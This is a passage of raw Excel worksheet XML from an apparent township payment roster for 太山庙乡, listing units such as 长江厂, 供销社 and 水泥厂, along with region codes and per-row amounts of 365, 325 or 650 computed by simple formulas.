        <v>长江厂</v>
      </c>
      <c r="D2284" s="80" t="s">
        <v>5993</v>
      </c>
      <c r="E2284" s="80" t="s">
        <v>5994</v>
      </c>
      <c r="F2284" s="17" t="str">
        <f>F2283</f>
        <v>4113210712</v>
      </c>
      <c r="G2284" s="17"/>
      <c r="H2284" s="17"/>
      <c r="I2284" s="17"/>
      <c r="J2284" s="17"/>
      <c r="K2284" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2285" customHeight="1" spans="1:11">
      <c r="A2285" s="16" t="s">
        <v>5995</v>
      </c>
      <c r="B2285" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2285" s="17" t="s">
        <v>5983</v>
      </c>
      <c r="D2285" s="17" t="s">
        <v>5996</v>
      </c>
      <c r="E2285" s="17" t="s">
        <v>5592</v>
      </c>
      <c r="F2285" s="17" t="s">
        <v>5942</v>
      </c>
      <c r="G2285" s="17">
        <v>1</v>
      </c>
      <c r="H2285" s="18">
        <v>365</v>
      </c>
      <c r="I2285" s="17">
        <f>H2285*G2285</f>
        <v>365</v>
      </c>
      <c r="J2285" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2285" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2286" customHeight="1" spans="1:11">
      <c r="A2286" s="16" t="s">
        <v>5997</v>
      </c>
      <c r="B2286" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2286" s="17" t="s">
        <v>5983</v>
      </c>
      <c r="D2286" s="17" t="s">
        <v>5998</v>
      </c>
      <c r="E2286" s="17" t="s">
        <v>5999</v>
      </c>
      <c r="F2286" s="17" t="s">
        <v>5942</v>
      </c>
      <c r="G2286" s="17">
        <v>2</v>
      </c>
      <c r="H2286" s="18">
        <v>325</v>
      </c>
      <c r="I2286" s="17">
        <f>H2286*G2286</f>
        <v>650</v>
      </c>
      <c r="J2286" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2286" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2287" customHeight="1" spans="1:11">
      <c r="A2287" s="16" t="s">
        <v>6000</v>
      </c>
      <c r="B2287" s="17" t="str">
        <f>B2286</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2287" s="17" t="str">
        <f>C2286</f>
        <v>长江厂</v>
      </c>
      <c r="D2287" s="23" t="s">
        <v>6001</v>
      </c>
      <c r="E2287" s="24" t="s">
        <v>6002</v>
      </c>
      <c r="F2287" s="17" t="str">
        <f>F2286</f>
        <v>4113210712</v>
      </c>
      <c r="G2287" s="17"/>
      <c r="H2287" s="17"/>
      <c r="I2287" s="17"/>
      <c r="J2287" s="17"/>
      <c r="K2287" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2288" customHeight="1" spans="1:11">
      <c r="A2288" s="16" t="s">
        <v>6003</v>
      </c>
      <c r="B2288" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2288" s="17" t="s">
        <v>5983</v>
      </c>
      <c r="D2288" s="17" t="s">
        <v>6004</v>
      </c>
      <c r="E2288" s="17" t="s">
        <v>5525</v>
      </c>
      <c r="F2288" s="17" t="s">
        <v>5942</v>
      </c>
      <c r="G2288" s="17">
        <v>1</v>
      </c>
      <c r="H2288" s="18">
        <v>365</v>
      </c>
      <c r="I2288" s="17">
        <f t="shared" ref="I2288:I2293" si="111">H2288*G2288</f>
        <v>365</v>
      </c>
      <c r="J2288" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2288" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2289" customHeight="1" spans="1:11">
      <c r="A2289" s="16" t="s">
        <v>6005</v>
      </c>
      <c r="B2289" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2289" s="17" t="s">
        <v>5983</v>
      </c>
      <c r="D2289" s="17" t="s">
        <v>6006</v>
      </c>
      <c r="E2289" s="17" t="s">
        <v>5900</v>
      </c>
      <c r="F2289" s="17" t="s">
        <v>5942</v>
      </c>
      <c r="G2289" s="17">
        <v>1</v>
      </c>
      <c r="H2289" s="18">
        <v>365</v>
      </c>
      <c r="I2289" s="17">
        <f t="shared" si="111"/>
        <v>365</v>
      </c>
      <c r="J2289" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2289" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2290" customHeight="1" spans="1:11">
      <c r="A2290" s="16" t="s">
        <v>6007</v>
      </c>
      <c r="B2290" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2290" s="17" t="s">
        <v>5983</v>
      </c>
      <c r="D2290" s="17" t="s">
        <v>6008</v>
      </c>
      <c r="E2290" s="17" t="s">
        <v>5465</v>
      </c>
      <c r="F2290" s="17" t="s">
        <v>5942</v>
      </c>
      <c r="G2290" s="17">
        <v>1</v>
      </c>
      <c r="H2290" s="18">
        <v>365</v>
      </c>
      <c r="I2290" s="17">
        <f t="shared" si="111"/>
        <v>365</v>
      </c>
      <c r="J2290" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2290" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2291" customHeight="1" spans="1:11">
      <c r="A2291" s="16" t="s">
        <v>6009</v>
      </c>
      <c r="B2291" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2291" s="17" t="s">
        <v>5983</v>
      </c>
      <c r="D2291" s="17" t="s">
        <v>6010</v>
      </c>
      <c r="E2291" s="17" t="s">
        <v>5539</v>
      </c>
      <c r="F2291" s="17" t="s">
        <v>5942</v>
      </c>
      <c r="G2291" s="17">
        <v>1</v>
      </c>
      <c r="H2291" s="18">
        <v>365</v>
      </c>
      <c r="I2291" s="17">
        <f t="shared" si="111"/>
        <v>365</v>
      </c>
      <c r="J2291" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2291" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2292" customHeight="1" spans="1:11">
      <c r="A2292" s="16" t="s">
        <v>6011</v>
      </c>
      <c r="B2292" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2292" s="17" t="s">
        <v>5983</v>
      </c>
      <c r="D2292" s="17" t="s">
        <v>6012</v>
      </c>
      <c r="E2292" s="17" t="s">
        <v>2235</v>
      </c>
      <c r="F2292" s="17" t="s">
        <v>5942</v>
      </c>
      <c r="G2292" s="17">
        <v>1</v>
      </c>
      <c r="H2292" s="18">
        <v>365</v>
      </c>
      <c r="I2292" s="17">
        <f t="shared" si="111"/>
        <v>365</v>
      </c>
      <c r="J2292" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2292" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2293" customHeight="1" spans="1:11">
      <c r="A2293" s="16" t="s">
        <v>6013</v>
      </c>
      <c r="B2293" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2293" s="17" t="s">
        <v>5983</v>
      </c>
      <c r="D2293" s="17" t="s">
        <v>6014</v>
      </c>
      <c r="E2293" s="17" t="s">
        <v>5539</v>
      </c>
      <c r="F2293" s="17" t="s">
        <v>5942</v>
      </c>
      <c r="G2293" s="17">
        <v>2</v>
      </c>
      <c r="H2293" s="18">
        <v>325</v>
      </c>
      <c r="I2293" s="17">
        <f t="shared" si="111"/>
        <v>650</v>
      </c>
      <c r="J2293" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2293" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2294" customHeight="1" spans="1:11">
      <c r="A2294" s="16" t="s">
        <v>6015</v>
      </c>
      <c r="B2294" s="17" t="str">
        <f>B2293</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2294" s="17" t="str">
        <f>C2293</f>
        <v>长江厂</v>
      </c>
      <c r="D2294" s="23" t="s">
        <v>6016</v>
      </c>
      <c r="E2294" s="24" t="s">
        <v>6017</v>
      </c>
      <c r="F2294" s="17" t="str">
        <f>F2293</f>
        <v>4113210712</v>
      </c>
      <c r="G2294" s="17"/>
      <c r="H2294" s="17"/>
      <c r="I2294" s="17"/>
      <c r="J2294" s="17"/>
      <c r="K2294" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2295" customHeight="1" spans="1:11">
      <c r="A2295" s="16" t="s">
        <v>6018</v>
      </c>
      <c r="B2295" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2295" s="17" t="s">
        <v>3448</v>
      </c>
      <c r="D2295" s="17" t="s">
        <v>6019</v>
      </c>
      <c r="E2295" s="17" t="s">
        <v>4380</v>
      </c>
      <c r="F2295" s="17" t="s">
        <v>5653</v>
      </c>
      <c r="G2295" s="17">
        <v>1</v>
      </c>
      <c r="H2295" s="18">
        <v>365</v>
      </c>
      <c r="I2295" s="17">
        <f>H2295*G2295</f>
        <v>365</v>
      </c>
      <c r="J2295" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2295" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2296" customHeight="1" spans="1:11">
      <c r="A2296" s="16" t="s">
        <v>6020</v>
      </c>
      <c r="B2296" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2296" s="17" t="s">
        <v>3448</v>
      </c>
      <c r="D2296" s="17" t="s">
        <v>6021</v>
      </c>
      <c r="E2296" s="17" t="s">
        <v>6022</v>
      </c>
      <c r="F2296" s="17" t="s">
        <v>5653</v>
      </c>
      <c r="G2296" s="17">
        <v>1</v>
      </c>
      <c r="H2296" s="18">
        <v>365</v>
      </c>
      <c r="I2296" s="17">
        <f>H2296*G2296</f>
        <v>365</v>
      </c>
      <c r="J2296" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2296" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2297" customHeight="1" spans="1:11">
      <c r="A2297" s="16" t="s">
        <v>6023</v>
      </c>
      <c r="B2297" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2297" s="17" t="s">
        <v>3448</v>
      </c>
      <c r="D2297" s="17" t="s">
        <v>6024</v>
      </c>
      <c r="E2297" s="17" t="s">
        <v>6025</v>
      </c>
      <c r="F2297" s="17" t="s">
        <v>5653</v>
      </c>
      <c r="G2297" s="17">
        <v>2</v>
      </c>
      <c r="H2297" s="18">
        <v>325</v>
      </c>
      <c r="I2297" s="17">
        <f>H2297*G2297</f>
        <v>650</v>
      </c>
      <c r="J2297" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2297" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2298" customHeight="1" spans="1:11">
      <c r="A2298" s="16" t="s">
        <v>6026</v>
      </c>
      <c r="B2298" s="17" t="str">
        <f>B2297</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2298" s="17" t="str">
        <f>C2297</f>
        <v>供销社</v>
      </c>
      <c r="D2298" s="24" t="s">
        <v>6027</v>
      </c>
      <c r="E2298" s="24" t="s">
        <v>6028</v>
      </c>
      <c r="F2298" s="17" t="str">
        <f>F2297</f>
        <v>4113210705</v>
      </c>
      <c r="G2298" s="17"/>
      <c r="H2298" s="17"/>
      <c r="I2298" s="17"/>
      <c r="J2298" s="17"/>
      <c r="K2298" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2299" customHeight="1" spans="1:11">
      <c r="A2299" s="16" t="s">
        <v>6029</v>
      </c>
      <c r="B2299" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2299" s="17" t="s">
        <v>3448</v>
      </c>
      <c r="D2299" s="17" t="s">
        <v>6030</v>
      </c>
      <c r="E2299" s="17" t="s">
        <v>6031</v>
      </c>
      <c r="F2299" s="17" t="s">
        <v>5653</v>
      </c>
      <c r="G2299" s="17">
        <v>2</v>
      </c>
      <c r="H2299" s="18">
        <v>325</v>
      </c>
      <c r="I2299" s="17">
        <f>H2299*G2299</f>
        <v>650</v>
      </c>
      <c r="J2299" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2299" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2300" customHeight="1" spans="1:11">
      <c r="A2300" s="16" t="s">
        <v>6032</v>
      </c>
      <c r="B2300" s="17" t="str">
        <f>B2299</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2300" s="17" t="str">
        <f>C2299</f>
        <v>供销社</v>
      </c>
      <c r="D2300" s="24" t="s">
        <v>6033</v>
      </c>
      <c r="E2300" s="24" t="s">
        <v>6034</v>
      </c>
      <c r="F2300" s="17" t="str">
        <f>F2299</f>
        <v>4113210705</v>
      </c>
      <c r="G2300" s="17"/>
      <c r="H2300" s="17"/>
      <c r="I2300" s="17"/>
      <c r="J2300" s="17"/>
      <c r="K2300" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2301" customHeight="1" spans="1:11">
      <c r="A2301" s="16" t="s">
        <v>6035</v>
      </c>
      <c r="B2301" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2301" s="17" t="s">
        <v>3448</v>
      </c>
      <c r="D2301" s="17" t="s">
        <v>6036</v>
      </c>
      <c r="E2301" s="17" t="s">
        <v>5443</v>
      </c>
      <c r="F2301" s="17" t="s">
        <v>5653</v>
      </c>
      <c r="G2301" s="17">
        <v>1</v>
      </c>
      <c r="H2301" s="18">
        <v>365</v>
      </c>
      <c r="I2301" s="17">
        <f>H2301*G2301</f>
        <v>365</v>
      </c>
      <c r="J2301" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2301" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2302" customHeight="1" spans="1:11">
      <c r="A2302" s="16" t="s">
        <v>6037</v>
      </c>
      <c r="B2302" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2302" s="17" t="s">
        <v>6038</v>
      </c>
      <c r="D2302" s="17" t="s">
        <v>6039</v>
      </c>
      <c r="E2302" s="17" t="s">
        <v>5952</v>
      </c>
      <c r="F2302" s="17" t="s">
        <v>5653</v>
      </c>
      <c r="G2302" s="17">
        <v>1</v>
      </c>
      <c r="H2302" s="18">
        <v>365</v>
      </c>
      <c r="I2302" s="17">
        <f>H2302*G2302</f>
        <v>365</v>
      </c>
      <c r="J2302" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2302" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2303" customHeight="1" spans="1:11">
      <c r="A2303" s="16" t="s">
        <v>6040</v>
      </c>
      <c r="B2303" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2303" s="17" t="s">
        <v>6038</v>
      </c>
      <c r="D2303" s="17" t="s">
        <v>6041</v>
      </c>
      <c r="E2303" s="17" t="s">
        <v>6042</v>
      </c>
      <c r="F2303" s="17" t="s">
        <v>5653</v>
      </c>
      <c r="G2303" s="17">
        <v>1</v>
      </c>
      <c r="H2303" s="18">
        <v>365</v>
      </c>
      <c r="I2303" s="17">
        <f>H2303*G2303</f>
        <v>365</v>
      </c>
      <c r="J2303" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2303" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2304" customHeight="1" spans="1:11">
      <c r="A2304" s="16" t="s">
        <v>6043</v>
      </c>
      <c r="B2304" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2304" s="17" t="s">
        <v>6044</v>
      </c>
      <c r="D2304" s="17" t="s">
        <v>6045</v>
      </c>
      <c r="E2304" s="17" t="s">
        <v>6046</v>
      </c>
      <c r="F2304" s="17" t="s">
        <v>6047</v>
      </c>
      <c r="G2304" s="17">
        <v>2</v>
      </c>
      <c r="H2304" s="18">
        <v>325</v>
      </c>
      <c r="I2304" s="17">
        <f>H2304*G2304</f>
        <v>650</v>
      </c>
      <c r="J2304" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2304" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2305" customHeight="1" spans="1:11">
      <c r="A2305" s="16" t="s">
        <v>6048</v>
      </c>
      <c r="B2305" s="17" t="str">
        <f>B2304</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2305" s="17" t="str">
        <f>C2304</f>
        <v>水泥厂</v>
      </c>
      <c r="D2305" s="23" t="s">
        <v>6049</v>
      </c>
      <c r="E2305" s="23" t="s">
        <v>6050</v>
      </c>
      <c r="F2305" s="17" t="str">
        <f>F2304</f>
        <v>411321071405</v>
      </c>
      <c r="G2305" s="17"/>
      <c r="H2305" s="17"/>
      <c r="I2305" s="17"/>
      <c r="J2305" s="17"/>
      <c r="K2305" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2306" customHeight="1" spans="1:11">
      <c r="A2306" s="16" t="s">
        <v>6051</v>
      </c>
      <c r="B2306" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2306" s="17" t="s">
        <v>6044</v>
      </c>
      <c r="D2306" s="17" t="s">
        <v>6052</v>
      </c>
      <c r="E2306" s="17" t="s">
        <v>5881</v>
      </c>
      <c r="F2306" s="17" t="s">
        <v>6047</v>
      </c>
      <c r="G2306" s="17">
        <v>2</v>
      </c>
      <c r="H2306" s="18">
        <v>325</v>
      </c>
      <c r="I2306" s="17">
        <f>H2306*G2306</f>
        <v>650</v>
      </c>
      <c r="J2306" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2306" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2307" customHeight="1" spans="1:11">
      <c r="A2307" s="16" t="s">
        <v>6053</v>
      </c>
      <c r="B2307" s="17" t="str">
        <f>B2306</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2307" s="17" t="str">
        <f>C2306</f>
        <v>水泥厂</v>
      </c>
      <c r="D2307" s="23" t="s">
        <v>6054</v>
      </c>
      <c r="E2307" s="81" t="s">
        <v>425</v>
      </c>
      <c r="F2307" s="17" t="str">
        <f>F2306</f>
        <v>411321071405</v>
      </c>
      <c r="G2307" s="17"/>
      <c r="H2307" s="17"/>
      <c r="I2307" s="17"/>
      <c r="J2307" s="17"/>
      <c r="K2307" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2308" customHeight="1" spans="1:11">
      <c r="A2308" s="16" t="s">
        <v>6055</v>
      </c>
      <c r="B2308" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2308" s="17" t="s">
        <v>6044</v>
      </c>
      <c r="D2308" s="17" t="s">
        <v>6056</v>
      </c>
      <c r="E2308" s="17" t="s">
        <v>5936</v>
      </c>
      <c r="F2308" s="17" t="s">
        <v>6047</v>
      </c>
      <c r="G2308" s="17">
        <v>1</v>
      </c>
      <c r="H2308" s="18">
        <v>365</v>
      </c>
      <c r="I2308" s="17">
        <f t="shared" ref="I2308:I2330" si="112">H2308*G2308</f>
        <v>365</v>
      </c>
      <c r="J2308" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2308" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2309" customHeight="1" spans="1:11">
      <c r="A2309" s="16" t="s">
        <v>6057</v>
      </c>
      <c r="B2309" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2309" s="17" t="s">
        <v>3436</v>
      </c>
      <c r="D2309" s="17" t="s">
        <v>6058</v>
      </c>
      <c r="E2309" s="17" t="s">
        <v>5821</v>
      </c>
      <c r="F2309" s="17" t="s">
        <v>5653</v>
      </c>
      <c r="G2309" s="17">
        <v>1</v>
      </c>
      <c r="H2309" s="18">
        <v>365</v>
      </c>
      <c r="I2309" s="17">
        <f t="shared" si="112"/>
        <v>365</v>
      </c>
      <c r="J2309" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2309" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2310" customHeight="1" spans="1:11">
      <c r="A2310" s="16" t="s">
        <v>6059</v>
      </c>
      <c r="B2310" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2310" s="17" t="s">
        <v>3436</v>
      </c>
      <c r="D2310" s="17" t="s">
        <v>6060</v>
      </c>
      <c r="E2310" s="17" t="s">
        <v>5426</v>
      </c>
      <c r="F2310" s="17" t="s">
        <v>5653</v>
      </c>
      <c r="G2310" s="17">
        <v>1</v>
      </c>
      <c r="H2310" s="18">
        <v>365</v>
      </c>
      <c r="I2310" s="17">
        <f t="shared" si="112"/>
        <v>365</v>
      </c>
      <c r="J2310" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2310" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2311" customHeight="1" spans="1:11">
      <c r="A2311" s="16" t="s">
        <v>6061</v>
      </c>
      <c r="B2311" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2311" s="17" t="s">
        <v>3436</v>
      </c>
      <c r="D2311" s="17" t="s">
        <v>6062</v>
      </c>
      <c r="E2311" s="17" t="s">
        <v>3486</v>
      </c>
      <c r="F2311" s="17" t="s">
        <v>5653</v>
      </c>
      <c r="G2311" s="17">
        <v>1</v>
      </c>
      <c r="H2311" s="18">
        <v>365</v>
      </c>
      <c r="I2311" s="17">
        <f t="shared" si="112"/>
        <v>365</v>
      </c>
      <c r="J2311" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2311" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2312" customHeight="1" spans="1:11">
      <c r="A2312" s="16" t="s">
        <v>6063</v>
      </c>
      <c r="B2312" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2312" s="17" t="s">
        <v>6064</v>
      </c>
      <c r="D2312" s="17" t="s">
        <v>6065</v>
      </c>
      <c r="E2312" s="17" t="s">
        <v>5999</v>
      </c>
      <c r="F2312" s="17" t="s">
        <v>6066</v>
      </c>
      <c r="G2312" s="17">
        <v>1</v>
      </c>
      <c r="H2312" s="18">
        <v>365</v>
      </c>
      <c r="I2312" s="17">
        <f t="shared" si="112"/>
        <v>365</v>
      </c>
      <c r="J2312" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2312" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2313" customHeight="1" spans="1:11">
      <c r="A2313" s="16" t="s">
        <v>6067</v>
      </c>
      <c r="B2313" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2313" s="17" t="s">
        <v>6064</v>
      </c>
      <c r="D2313" s="17" t="s">
        <v>6068</v>
      </c>
      <c r="E2313" s="17" t="s">
        <v>5716</v>
      </c>
      <c r="F2313" s="17" t="s">
        <v>6066</v>
      </c>
      <c r="G2313" s="17">
        <v>1</v>
      </c>
      <c r="H2313" s="18">
        <v>365</v>
      </c>
      <c r="I2313" s="17">
        <f t="shared" si="112"/>
        <v>365</v>
      </c>
      <c r="J2313" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2313" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2314" customHeight="1" spans="1:11">
      <c r="A2314" s="16" t="s">
        <v>6069</v>
      </c>
      <c r="B2314" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2314" s="17" t="s">
        <v>6064</v>
      </c>
      <c r="D2314" s="17" t="s">
        <v>6070</v>
      </c>
      <c r="E2314" s="17" t="s">
        <v>5401</v>
      </c>
      <c r="F2314" s="17" t="s">
        <v>6066</v>
      </c>
      <c r="G2314" s="17">
        <v>1</v>
      </c>
      <c r="H2314" s="18">
        <v>365</v>
      </c>
      <c r="I2314" s="17">
        <f t="shared" si="112"/>
        <v>365</v>
      </c>
      <c r="J2314" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2314" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2315" customHeight="1" spans="1:11">
      <c r="A2315" s="16" t="s">
        <v>6071</v>
      </c>
      <c r="B2315" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2315" s="17" t="s">
        <v>6064</v>
      </c>
      <c r="D2315" s="17" t="s">
        <v>6072</v>
      </c>
      <c r="E2315" s="17" t="s">
        <v>5085</v>
      </c>
      <c r="F2315" s="17" t="s">
        <v>6066</v>
      </c>
      <c r="G2315" s="17">
        <v>1</v>
      </c>
      <c r="H2315" s="18">
        <v>365</v>
      </c>
      <c r="I2315" s="17">
        <f t="shared" si="112"/>
        <v>365</v>
      </c>
      <c r="J2315" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2315" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2316" customHeight="1" spans="1:11">
      <c r="A2316" s="16" t="s">
        <v>6073</v>
      </c>
      <c r="B2316" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2316" s="17" t="s">
        <v>6064</v>
      </c>
      <c r="D2316" s="17" t="s">
        <v>6074</v>
      </c>
      <c r="E2316" s="17" t="s">
        <v>5539</v>
      </c>
      <c r="F2316" s="17" t="s">
        <v>6066</v>
      </c>
      <c r="G2316" s="17">
        <v>1</v>
      </c>
      <c r="H2316" s="18">
        <v>365</v>
      </c>
      <c r="I2316" s="17">
        <f t="shared" si="112"/>
        <v>365</v>
      </c>
      <c r="J2316" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2316" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2317" customHeight="1" spans="1:11">
      <c r="A2317" s="16" t="s">
        <v>6075</v>
      </c>
      <c r="B2317" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2317" s="17" t="s">
        <v>6064</v>
      </c>
      <c r="D2317" s="17" t="s">
        <v>6076</v>
      </c>
      <c r="E2317" s="17" t="s">
        <v>5890</v>
      </c>
      <c r="F2317" s="17" t="s">
        <v>6066</v>
      </c>
      <c r="G2317" s="17">
        <v>1</v>
      </c>
      <c r="H2317" s="18">
        <v>365</v>
      </c>
      <c r="I2317" s="17">
        <f t="shared" si="112"/>
        <v>365</v>
      </c>
      <c r="J2317" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2317" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2318" customHeight="1" spans="1:11">
      <c r="A2318" s="16" t="s">
        <v>6077</v>
      </c>
      <c r="B2318" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2318" s="17" t="s">
        <v>6064</v>
      </c>
      <c r="D2318" s="17" t="s">
        <v>6078</v>
      </c>
      <c r="E2318" s="17" t="s">
        <v>3486</v>
      </c>
      <c r="F2318" s="17" t="s">
        <v>6066</v>
      </c>
      <c r="G2318" s="17">
        <v>1</v>
      </c>
      <c r="H2318" s="18">
        <v>365</v>
      </c>
      <c r="I2318" s="17">
        <f t="shared" si="112"/>
        <v>365</v>
      </c>
      <c r="J2318" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2318" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2319" customHeight="1" spans="1:11">
      <c r="A2319" s="16" t="s">
        <v>6079</v>
      </c>
      <c r="B2319" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2319" s="17" t="s">
        <v>6064</v>
      </c>
      <c r="D2319" s="17" t="s">
        <v>6080</v>
      </c>
      <c r="E2319" s="17" t="s">
        <v>5465</v>
      </c>
      <c r="F2319" s="17" t="s">
        <v>6066</v>
      </c>
      <c r="G2319" s="17">
        <v>1</v>
      </c>
      <c r="H2319" s="18">
        <v>365</v>
      </c>
      <c r="I2319" s="17">
        <f t="shared" si="112"/>
        <v>365</v>
      </c>
      <c r="J2319" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2319" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2320" customHeight="1" spans="1:11">
      <c r="A2320" s="16" t="s">
        <v>6081</v>
      </c>
      <c r="B2320" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2320" s="17" t="s">
        <v>6064</v>
      </c>
      <c r="D2320" s="17" t="s">
        <v>6082</v>
      </c>
      <c r="E2320" s="17" t="s">
        <v>5042</v>
      </c>
      <c r="F2320" s="17" t="s">
        <v>6066</v>
      </c>
      <c r="G2320" s="17">
        <v>1</v>
      </c>
      <c r="H2320" s="18">
        <v>365</v>
      </c>
      <c r="I2320" s="17">
        <f t="shared" si="112"/>
        <v>365</v>
      </c>
      <c r="J2320" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2320" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2321" customHeight="1" spans="1:22">
      <c r="A2321" s="16" t="s">
        <v>6083</v>
      </c>
      <c r="B2321" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2321" s="17" t="s">
        <v>6064</v>
      </c>
      <c r="D2321" s="17" t="s">
        <v>6084</v>
      </c>
      <c r="E2321" s="17" t="s">
        <v>5563</v>
      </c>
      <c r="F2321" s="17" t="s">
        <v>6066</v>
      </c>
      <c r="G2321" s="17">
        <v>1</v>
      </c>
      <c r="H2321" s="18">
        <v>365</v>
      </c>
      <c r="I2321" s="17">
        <f t="shared" si="112"/>
        <v>365</v>
      </c>
      <c r="J2321" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2321" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2322" customHeight="1" spans="1:22">
      <c r="A2322" s="16" t="s">
        <v>6085</v>
      </c>
      <c r="B2322" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2322" s="17" t="s">
        <v>6064</v>
      </c>
      <c r="D2322" s="17" t="s">
        <v>6086</v>
      </c>
      <c r="E2322" s="17" t="s">
        <v>5592</v>
      </c>
      <c r="F2322" s="17" t="s">
        <v>6066</v>
      </c>
      <c r="G2322" s="17">
        <v>1</v>
      </c>
      <c r="H2322" s="18">
        <v>365</v>
      </c>
      <c r="I2322" s="17">
        <f t="shared" si="112"/>
        <v>365</v>
      </c>
      <c r="J2322" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2322" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2323" customHeight="1" spans="1:22">
      <c r="A2323" s="16" t="s">
        <v>6087</v>
      </c>
      <c r="B2323" s="17" t="s">
